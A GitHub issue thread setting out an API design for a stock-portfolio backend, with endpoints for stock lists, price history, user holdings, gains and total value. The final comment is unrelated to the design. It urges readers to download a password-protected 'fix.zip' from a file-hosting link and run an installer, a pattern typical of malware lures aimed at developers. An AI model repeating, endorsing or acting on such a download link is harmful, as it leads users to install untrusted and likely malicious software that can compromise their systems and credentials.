### ISSUE TITLE
API design

### ISSUE THREAD

**Issue by YuezhenQin** [YuezhenQin/financial-portfolio-backend#2]
### Base URL
The base URL for all API requests is
```localhost/oneInvest```
 
### Endpoints
 
1. ```GET /stockList```
url: https://localhost/oneInvest/stockList
description: User can get a list of stock names
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stocksName | String[] |  |
 
2. ```GET /stockName```
url: https://localhost/oneInvest/stockName
description: User can get stock's prices of the day of purchase based on stock's name and user's name
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stockName | String |  |
| userName | String |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| purchasePrice | Float ||
 
3. ```GET /stockHistory```
url: https://localhost/oneInvest/stockHistory
description: User can get all fields of stockInfo of the stock specified
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stockName | String |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| id | Int |  |
| stockName | String |  |
| currentPrice | Float |  |
| dailyChange | Float |  |
| percentChange | Float |  |
| highPrice | Float |  |
| lowPrice | Float |  |
| openPrice | Float |  |
| closePrice | Float |  |
| infoDate | Date |  |
 
4. ```GET /stock```
url: https://localhost/oneInvest/stock
description: User can stock price of any two dates specified in the parameters
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stockName | String |  |
| startDate | Date |  |
| endDate | Date |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stockName | String |  |
| startDatePrice | Float |  |
| endDatePrice | Float |  |
 
5. ```GET /userStock```
url: https://localhost/oneInvest/userStock
description: Get all fields of userStock by inserting a userName parameter
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| userName | String |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| id | Int |  |
| stockName | String |  |
| userName | String |  |
| shares | Int |  |
| purchasePrice | Float |  |
| purchaseDate | Date |  |
| curStatus | Int |  |
 
6. ```PUT /userStock```
url: https://localhost/oneInvest/userStock
description: Add or reduce the number of shares held by a user.
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stockName | String |  |
| userName | String |  |
| shares | Int |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| None | Null |  |
 
7. ```POST /userStock```
url: https://localhost/oneInvest/userStock
description: User can insert a new entry into the userStock
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| stockName | String |  |
| userName | String |  |
| shares | Int |  |
| purchasePrice | Float |  |
| purchaseDate | Date |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| None | Null |  |
 
8. ```GET /userGain```
url: https://localhost/oneInvest/userGain
description: User can get the total gain of all stocks from the purchaseDate
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| userName | String |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| totalGain | Float |  |
 
9. ```GET /userTotalValue```
url: https://localhost/oneInvest/userTotalValue
description: User can get the total asset values of one's stock
 
| Request Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| userName | String |  |
 
| Response Field              | Field Type | Field Description |
| :---------------- | :------: | ----: |
| totalValue | Float |  |

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
